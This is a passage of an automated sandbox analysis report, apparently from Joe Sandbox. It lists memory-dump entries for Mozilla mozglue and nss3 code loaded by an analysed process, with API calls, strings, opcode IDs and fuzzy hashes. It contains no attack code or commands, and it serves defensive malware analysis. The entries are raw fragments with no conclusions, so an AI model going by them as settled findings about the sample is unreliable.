                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                        • Opcode ID: 1a151c081971272750d116e9bab1d5ccad8eaa6e4ff57c2ba4f1ae070f606a2b
                                                                                                                                                                                                                                                                                        • Instruction ID: 995d13fdeb35d8e484a8867a390f5a75d3f75f6c547f1bcc68da5d251c4f77d6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a151c081971272750d116e9bab1d5ccad8eaa6e4ff57c2ba4f1ae070f606a2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A91F571A147458FD714CF3AC29476AB7E1EBA9314F24893EE85A87F81D730E844CB86
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C3F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C60
                                                                                                                                                                                                                                                                                        • PR_ExplodeTime.NSS3(00000000,6C861C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C94
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                        • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                        • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                        • Opcode ID: fe973d3d3870abcda47a10f23bf6be14a1e39b5795e82f83136254a2e05bf9c1
                                                                                                                                                                                                                                                                                        • Instruction ID: a185a8f48e782ba5d54b16ec129dba9c11bd233bff8a5014129a30d068e077fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe973d3d3870abcda47a10f23bf6be14a1e39b5795e82f83136254a2e05bf9c1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3514C72B015494FC71CCDADDC626DAB7DAABA4310F48C23AE442DB785D638E906C751
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7B8A4B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                        • String ID: ~qtl
                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-4039154517
                                                                                                                                                                                                                                                                                        • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                        • Instruction ID: 43b63620c4766762d50e298508506ead9c8a38e7e8957a14f21546e44531ee93
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4B1E672E0121A8FDB14CF68CD907E9B7B2EF95314F1802B9C559EB786D730A985CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7B88F0
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C7B925C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                        • String ID: ~qtl
                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-4039154517
                                                                                                                                                                                                                                                                                        • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                        • Instruction ID: eb7fe4ae62fe846af9d49f715bda305596c7bedc38339d71bb0d1817cbd0e960
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23B1C472E0120A8FDB14CE68C9816EDB7B2EF95314F184279C959EB785D730A989CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: e46ae58c0ee5523e9bec640e8fdd1f0e4b6cef39bc2c3c47083b0a2248aac3a2
                                                                                                                                                                                                                                                                                        • Instruction ID: b475945edc007d0e16dd8d22dff84ea01919cda12edbac8af1a804b18ed7e494
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e46ae58c0ee5523e9bec640e8fdd1f0e4b6cef39bc2c3c47083b0a2248aac3a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4211CE79708315DFCB00DF29C884A6A77B6FFC5368F249069D8198B701DB71E806CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(user32,?,6C77E1A5), ref: 6C7A5606
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(gdi32,?,6C77E1A5), ref: 6C7A560F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C7A5633
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C7A563D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C7A566C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C7A567D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C7A5696
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7A56B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7A56CB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7A56E4
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7A56FD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C7A5716
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C7A572F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C7A5748
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C7A5761
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C7A577A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C7A5793
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7A57A8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7A57BD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7A57D5
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7A57EA
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7A57FF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                        • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                        • Opcode ID: 6f289a49e71c98d71c27b3189278d3b13e9d46ede5f11fdb4953f8189c43c132
                                                                                                                                                                                                                                                                                        • Instruction ID: 27bbf817458b31280ffb3ec4afd021103bd54c46169a690e2472274afd9a2690
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f289a49e71c98d71c27b3189278d3b13e9d46ede5f11fdb4953f8189c43c132
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B516274701B076FDB449F76AF4492A3AFCBB0AB45B104539B921E3A01EB74DB018F61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default), ref: 6C78CC27
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java), ref: 6C78CC3D
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C7BFE98), ref: 6C78CC56
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf), ref: 6C78CC6C
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio), ref: 6C78CC82
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio), ref: 6C78CC98
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall), ref: 6C78CCAE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C78CCC4
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C78CCDA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C78CCEC
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C78CCFE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C78CD14
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C78CD82
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C78CD98
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C78CDAE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C78CDC4
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C78CDDA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C78CDF0
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C78CE06
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C78CE1C
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C78CE32
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C78CE48
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C78CE5E
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C78CE74
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C78CE8A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strcmp
                                                                                                                                                                                                                                                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                        • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                        • Opcode ID: 124aee638f0b12b98fafa22b75a0a301e950c157328392bbc425b814ec2cbe57
                                                                                                                                                                                                                                                                                        • Instruction ID: 6417eee8646b84a425ab46301be522ce33ef7fe13acb619d5ba3af4b526f11c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 124aee638f0b12b98fafa22b75a0a301e950c157328392bbc425b814ec2cbe57
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B551BBC5A4722552FA0035256F1ABAA1409EF5324BF50C63AEF09B2F80FF15F70986B7
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C754730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7544B2,6C7CE21C,6C7CF7F8), ref: 6C75473E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C754730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C75474A
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C7544BA
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C7544D2
                                                                                                                                                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C7CF80C,6C74F240,?,?), ref: 6C75451A
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C75455C
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 6C754592
                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C7CF770), ref: 6C7545A2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C7545AA
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C7545BB
                                                                                                                                                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C7CF818,6C74F240,?,?), ref: 6C754612
                                                                                                                                                                                                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C754636
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C754644
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C75466D
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C75469F
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546AB
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546B2
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546B9
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7546C0
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7546CD
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C7546F1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C7546FD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                                        • String ID: G|l$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 1702738223-4167449071
                                                                                                                                                                                                                                                                                        • Opcode ID: 2f3679500a603b1117d34127790f872038f477b1f7a6d24a9320e1d8c6182a27
                                                                                                                                                                                                                                                                                        • Instruction ID: 9ed49d03d673ca46947eaaf3c96f8595439232678bc12c38bd2d5ee2329635b1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f3679500a603b1117d34127790f872038f477b1f7a6d24a9320e1d8c6182a27
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF6106B0A0024AAFEB109F61CE49BA57BF8EB46708F44C578E9049B641DB719B64CF91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4C50
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4C5B
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(6C99AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4C76
                                                                                                                                                                                                                                                                                        • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4CAE
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8C4CC9
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8C4CF4
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8C4D0B
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4D5E
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4D68
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C8C4D85
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C8C4DA2
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8C4DB9
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8C4DCF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                        • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                        • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                                        • Opcode ID: 09a8075f2a4d9ae32b278ac17e009d0c9034e5aaa70299f0c274f1740d4139a0
                                                                                                                                                                                                                                                                                        • Instruction ID: 9db9779a80cce071425e569958bd46154cd9b38d3484f3715a0103d037375c28
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09a8075f2a4d9ae32b278ac17e009d0c9034e5aaa70299f0c274f1740d4139a0
